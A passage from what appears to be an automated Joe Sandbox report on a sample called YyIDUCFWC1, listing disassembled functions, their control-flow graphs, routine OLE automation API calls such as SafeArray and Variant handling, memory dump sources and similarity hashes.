                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F632B374E012299FDB64DFA9C894BEDBBB2BF89300F1081AAD449A7354DB305E85CF51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D58EE8 Relevance: .4, Instructions: 401COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 06499017f1de70650fba8bb774ca073491e909ce03603e6baeac0813cf9296bc
                                                                                                                                                                                                                                              • Instruction ID: 8e3ba1d6775084d009ed904c7d177d7a2b53aa97a4e4bd70732e600881cc777b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06499017f1de70650fba8bb774ca073491e909ce03603e6baeac0813cf9296bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D212B074E01228CFDB64DF69D998B9DBBB2BF88300F1081A9D909A7351DB709E85CF51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 05B026DC Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1709698902.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b00000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: dfd6a0a62803b0c6fd4c967b13ab44f0917bc65432b01fbd2609e809434a5410
                                                                                                                                                                                                                                              • Instruction ID: 207ab56e410237b4e65e137858c4244f7335bc00b486ee7d0f059d638f5b1788
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfd6a0a62803b0c6fd4c967b13ab44f0917bc65432b01fbd2609e809434a5410
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5591C174E012289FDB68DF69C850B9DBBB2BF88300F1481AAD44DAB394DB305E85CF51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF9357 Relevance: 41.0, APIs: 21, Strings: 1, Instructions: 2492COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEF84BF
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF84D2
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32 ref: 6CEF850A
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEF94C1
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF94D4
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CEF950C
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEF97A4
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF97B7
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CEF97F2
                                                                                                                                                                                                                                                • Part of subcall function 6CEF3A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEF3B71
                                                                                                                                                                                                                                                • Part of subcall function 6CEF3A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF3B83
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEF9D5F
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF9D72
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CEF9DAF
                                                                                                                                                                                                                                                • Part of subcall function 6CEF3A90: SafeArrayDestroy.OLEAUT32(?), ref: 6CEF3BCF
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEFA1BC
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEFA1CF
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CEFA20C
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Bound$Destroy$Element
                                                                                                                                                                                                                                              • String ID: A
                                                                                                                                                                                                                                              • API String ID: 959723449-3554254475
                                                                                                                                                                                                                                              • Opcode ID: cd3a2f19157be49136c092fc2646eebe26e6c4fbfb462509fd6ca8ba283fd511
                                                                                                                                                                                                                                              • Instruction ID: 6058ccbb4e8b1834d32577a6ea6e023dfe469990490b10c288ad4f432099df62
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd3a2f19157be49136c092fc2646eebe26e6c4fbfb462509fd6ca8ba283fd511
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD23A271A012049FDB00DFA4C884FDD77B9AF49308F258198EA59EF792DB71E986CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF2970 Relevance: 25.8, APIs: 17, Instructions: 335COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1024 6cef2970-6cef29c1 1025 6cef29cd-6cef29d7 1024->1025 1026 6cef29c3-6cef29c8 call 6cf4c1e0 1024->1026 1090 6cef29d8 call 127d171 1025->1090 1091 6cef29d8 call 127d170 1025->1091 1026->1025 1028 6cef29da-6cef29dc 1029 6cef2d12-6cef2d18 1028->1029 1030 6cef29e2-6cef29e8 1028->1030 1032 6cef2d21-6cef2d37 1029->1032 1033 6cef2d1a-6cef2d1b SafeArrayDestroy 1029->1033 1031 6cef29ee-6cef2a1a SafeArrayGetLBound SafeArrayGetUBound 1030->1031 1030->1032 1031->1029 1034 6cef2a20-6cef2a37 SafeArrayGetElement 1031->1034 1033->1032 1034->1029 1035 6cef2a3d-6cef2a4d 1034->1035 1035->1026 1036 6cef2a53-6cef2a66 1035->1036 1092 6cef2a67 call 127d171 1036->1092 1093 6cef2a67 call 127d170 1036->1093 1037 6cef2a69-6cef2a6f 1038 6cef2d5a-6cef2d5f 1037->1038 1039 6cef2a75-6cef2a77 1037->1039 1040 6cef2c76-6cef2c78 1038->1040 1039->1038 1041 6cef2a7d-6cef2a92 call 6cef38e0 1039->1041 1040->1029 1043 6cef2c7e-6cef2c86 1040->1043 1045 6cef2c58-6cef2c63 1041->1045 1046 6cef2a98-6cef2aac 1041->1046 1043->1029 1050 6cef2c6d-6cef2c72 1045->1050 1051 6cef2c65-6cef2c6a 1045->1051 1048 6cef2aae-6cef2ab3 1046->1048 1049 6cef2ab6-6cef2acc VariantInit 1046->1049 1048->1049 1049->1026 1052 6cef2ad2-6cef2ae3 1049->1052 1050->1040 1051->1050 1053 6cef2ae9-6cef2aeb 1052->1053 1054 6cef2ae5-6cef2ae7 1052->1054 1055 6cef2aee-6cef2af2 1053->1055 1054->1055 1056 6cef2af8 1055->1056 1057 6cef2af4-6cef2af6 1055->1057 1058 6cef2afa-6cef2b34 1056->1058 1057->1058 1060 6cef2c8b-6cef2caa VariantClear * 2 1058->1060 1061 6cef2b3a-6cef2b50 VariantInit 1058->1061 1060->1050 1062 6cef2cac-6cef2cb4 1060->1062 1061->1026 1063 6cef2b56-6cef2b67 1061->1063 1062->1050 1064 6cef2b6d-6cef2b6f 1063->1064 1065 6cef2b69-6cef2b6b 1063->1065 1067 6cef2b72-6cef2b76 1064->1067 1065->1067 1068 6cef2b7c 1067->1068 1069 6cef2b78-6cef2b7a 1067->1069 1070 6cef2b7e-6cef2bb8 1068->1070 1069->1070 1072 6cef2bbe-6cef2bcb 1070->1072 1073 6cef2d3a-6cef2d55 VariantClear * 3 1070->1073 1072->1073 1074 6cef2bd1-6cef2bf3 call 6cf03160 1072->1074 1073->1045 1078 6cef2bf9-6cef2c1f VariantClear * 3 1074->1078 1079 6cef2cb6-6cef2cf1 VariantClear * 3 1074->1079 1080 6cef2c29-6cef2c34 1078->1080 1081 6cef2c21-6cef2c26 1078->1081 1086 6cef2cfb-6cef2d06 1079->1086 1087 6cef2cf3-6cef2cf6 1079->1087 1082 6cef2c3e-6cef2c4d 1080->1082 1083 6cef2c36-6cef2c3b 1080->1083 1081->1080 1082->1034 1085 6cef2c53 1082->1085 1083->1082 1085->1029 1088 6cef2d08-6cef2d0d 1086->1088 1089 6cef2d10 1086->1089 1087->1086 1088->1089 1089->1029 1090->1028 1091->1028 1092->1037 1093->1037
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEF29F6
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF2A08
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEF2A2F
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF2ABB
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF2B3F
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF2C04
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF2C0B
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF2C12
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF2C96
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF2C9D
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF2CD6
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF2CDD
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF2CE4
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF2D1B
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF2D45
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF2D4C
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF2D53
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 214056513-0
                                                                                                                                                                                                                                              • Opcode ID: de5bae7b607cccdb5b104ce85c12d366076060ff1bc887ce782e508b3bd5cc10
                                                                                                                                                                                                                                              • Instruction ID: 772834394fe155694e5ac63f415c0048b17c08bda44631bed72a5c3f4ab801e4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de5bae7b607cccdb5b104ce85c12d366076060ff1bc887ce782e508b3bd5cc10
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FC15E716083819FD700CFA8C884A5BBBF9AF99304F20895DF6A5C7360C775E846CB62
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEAF30 Relevance: 24.3, APIs: 16, Instructions: 335COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1094 6ceeaf30-6ceeaf95 VariantInit * 3 1095 6ceeaf97-6ceeaf9c call 6cf4c1e0 1094->1095 1096 6ceeafa1-6ceeafa7 1094->1096 1095->1096 1098 6ceeafa9-6ceeafae 1096->1098 1099 6ceeafb1-6ceeafbf 1096->1099 1098->1099 1175 6ceeafc0 call 127d171 1099->1175 1176 6ceeafc0 call 127d170 1099->1176 1100 6ceeafc2-6ceeafc4 1101 6ceeb22c-6ceeb252 VariantClear * 3 1100->1101 1102 6ceeafca-6ceeafda call 6cef38e0 1100->1102 1103 6ceeb25c-6ceeb26a 1101->1103 1104 6ceeb254-6ceeb257 1101->1104 1102->1101 1109 6ceeafe0-6ceeaff4 1102->1109 1107 6ceeb26c-6ceeb271 1103->1107 1108 6ceeb274-6ceeb288 1103->1108 1104->1103 1107->1108 1110 6ceeaffe-6ceeb015 VariantCopy 1109->1110 1111 6ceeaff6-6ceeaff9 1109->1111 1112 6ceeb01d-6ceeb033 VariantClear 1110->1112 1113 6ceeb017-6ceeb018 call 6cf4c1e0 1110->1113 1111->1110 1115 6ceeb03f-6ceeb050 1112->1115 1116 6ceeb035-6ceeb03a call 6cf4c1e0 1112->1116 1113->1112 1118 6ceeb056-6ceeb058 1115->1118 1119 6ceeb052-6ceeb054 1115->1119 1116->1115 1120 6ceeb05b-6ceeb05f 1118->1120 1119->1120 1121 6ceeb065 1120->1121 1122 6ceeb061-6ceeb063 1120->1122 1123 6ceeb067-6ceeb09a 1121->1123 1122->1123 1173 6ceeb09d call 127d171 1123->1173 1174 6ceeb09d call 127d170 1123->1174 1124 6ceeb09f-6ceeb0a1 1124->1101 1125 6ceeb0a7-6ceeb0b3 call 6cf39bb5 1124->1125 1128 6ceeb0b5-6ceeb0bf 1125->1128 1129 6ceeb0c1 1125->1129 1130 6ceeb0c3-6ceeb0ca 1128->1130 1129->1130 1131 6ceeb0d0-6ceeb0d9 1130->1131 1131->1131 1132 6ceeb0db-6ceeb111 call 6cf391e1 call 6cf3a136 1131->1132 1137 6ceeb11d-6ceeb12b 1132->1137 1138 6ceeb113-6ceeb118 call 6cf4c1e0 1132->1138 1140 6ceeb12d-6ceeb12f 1137->1140 1141 6ceeb131-6ceeb133 1137->1141 1138->1137 1142 6ceeb136-6ceeb13a 1140->1142 1141->1142 1143 6ceeb13c-6ceeb13e 1142->1143 1144 6ceeb140 1142->1144 1145 6ceeb142-6ceeb17e 1143->1145 1144->1145 1147 6ceeb1ff-6ceeb203 1145->1147 1148 6ceeb180-6ceeb18a 1145->1148 1149 6ceeb205-6ceeb20e call 6cf39c35 1147->1149 1150 6ceeb210-6ceeb215 1147->1150 1151 6ceeb28d-6ceeb2b8 VariantClear * 3 1148->1151 1152 6ceeb190-6ceeb1b9 SafeArrayGetLBound SafeArrayGetUBound 1148->1152 1149->1150 1156 6ceeb217-6ceeb220 call 6cf39c35 1150->1156 1157 6ceeb223-6ceeb229 call 6cf39b35 1150->1157 1154 6ceeb2ba-6ceeb2bf 1151->1154 1155 6ceeb2c2-6ceeb2d0 1151->1155 1158 6ceeb1bf-6ceeb1cd SafeArrayAccessData 1152->1158 1159 6ceeb28b 1152->1159 1154->1155 1162 6ceeb2da-6ceeb2ee 1155->1162 1163 6ceeb2d2-6ceeb2d7 1155->1163 1156->1157 1157->1101 1158->1159 1165 6ceeb1d3-6ceeb1f7 call 6cf391e1 call 6cf3a530 SafeArrayUnaccessData 1158->1165 1159->1151 1163->1162 1165->1159 1172 6ceeb1fd 1165->1172 1172->1147 1173->1124 1174->1124 1175->1100 1176->1100
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEEAF75
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEEAF7C
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEEAF83
                                                                                                                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 6CEEB00D
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEEB027
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEEB19C
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEEB1AA
                                                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 6CEEB1C5
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CEEB1E6
                                                                                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 6CEEB1EF
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEEB237
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEEB23E
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEEB245
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEEB29D
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEEB2A4
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEEB2AB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3403836469-0
                                                                                                                                                                                                                                              • Opcode ID: 188adb3c0c0671a989e7f861cf4e895177d34f097ee43f623046571bc12aa59b
                                                                                                                                                                                                                                              • Instruction ID: 37894eedabc2350f35f76f8cedb75c11205aa026b5e6637c38c20284f4f21dee
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 188adb3c0c0671a989e7f861cf4e895177d34f097ee43f623046571bc12aa59b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BC148B2A043419FD700DFA8C884A5AB7F9FF89344F24896DE659C7750DB31E905CBA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFD410 Relevance: 24.3, APIs: 16, Instructions: 290COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1177 6cefd410-6cefd44c 1178 6cefd44e-6cefd465 1177->1178 1179 6cefd472-6cefd4e0 VariantInit * 3 1177->1179 1180 6cefd470 1178->1180 1181 6cefd4ec-6cefd4f2 1179->1181 1182 6cefd4e2-6cefd4ea 1179->1182 1180->1179 1183 6cefd4f6-6cefd504 1181->1183 1182->1183 1184 6cefd51e-6cefd527 1183->1184 1185 6cefd506-6cefd50d 1183->1185 1188 6cefd529-6cefd530 1184->1188 1189 6cefd538-6cefd53c 1184->1189 1186 6cefd50f-6cefd512 1185->1186 1187 6cefd514-6cefd516 1185->1187 1191 6cefd518-6cefd51c 1186->1191 1187->1191 1188->1189 1190 6cefd532-6cefd536 1188->1190 1192 6cefd540-6cefd544 1189->1192 1190->1192 1191->1184 1191->1185 1193 6cefd54a-6cefd5c0 call 6cf39d66 SafeArrayCreateVector * 2 SafeArrayAccessData 1192->1193 1194 6cefd704-6cefd72f VariantClear * 3 1192->1194 1201 6cefd5c6-6cefd5ea call 6cf3a530 SafeArrayUnaccessData 1193->1201 1202 6cefd5c2-6cefd5c4 1193->1202 1195 6cefd76c-6cefd783 1194->1195 1196 6cefd731-6cefd757 1194->1196 1196->1180 1198 6cefd75d 1196->1198 1204 6cefd5ec-6cefd605 SafeArrayPutElement 1201->1204 1202->1204 1206 6cefd60b-6cefd629 1204->1206 1207 6cefd6e5-6cefd6eb 1204->1207 1208 6cefd62b-6cefd630 1206->1208 1209 6cefd633-6cefd64f SafeArrayPutElement VariantClear 1206->1209 1210 6cefd6ed-6cefd6f3 call 6cf39d2c 1207->1210 1211 6cefd6f6-6cefd6f8 1207->1211 1208->1209 1209->1207 1213 6cefd655-6cefd664 1209->1213 1210->1211 1214 6cefd6fa-6cefd6fb SafeArrayDestroy 1211->1214 1215 6cefd701 1211->1215 1217 6cefd66a-6cefd694 1213->1217 1218 6cefd762-6cefd767 call 6cf4c1e0 1213->1218 1214->1215 1215->1194 1230 6cefd697 call 127d171 1217->1230 1231 6cefd697 call 127d170 1217->1231 1218->1195 1220 6cefd699-6cefd69b 1220->1207 1221 6cefd69d-6cefd6a9 1220->1221 1221->1207 1222 6cefd6ab-6cefd6c1 call 6ceedb30 1221->1222 1222->1207 1225 6cefd6c3-6cefd6e0 call 6cef56b0 call 6cef6880 1222->1225 1225->1207 1230->1220 1231->1220
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32 ref: 6CEFD4B3
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32 ref: 6CEFD4C5
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFD4CC
                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6CEFD551
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEFD58B
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32 ref: 6CEFD5A6
                                                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32 ref: 6CEFD5B8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1552365394-0
                                                                                                                                                                                                                                              • Opcode ID: 3558070a9a147e3b4ef7d6335d38b27d1d55493a4a4b12f0f4e434902c5343e2
                                                                                                                                                                                                                                              • Instruction ID: 1c69cead036bb1c81f099b22ed3a42a5fa22d2a962e239f0fe92acab4fbdc175
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3558070a9a147e3b4ef7d6335d38b27d1d55493a4a4b12f0f4e434902c5343e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50B158756083409FD315CF28C880A5BBBF9FF89318F25895DE9A58B750E731E906CB92
                                                                                                                                                                                                                                              Uniqueness

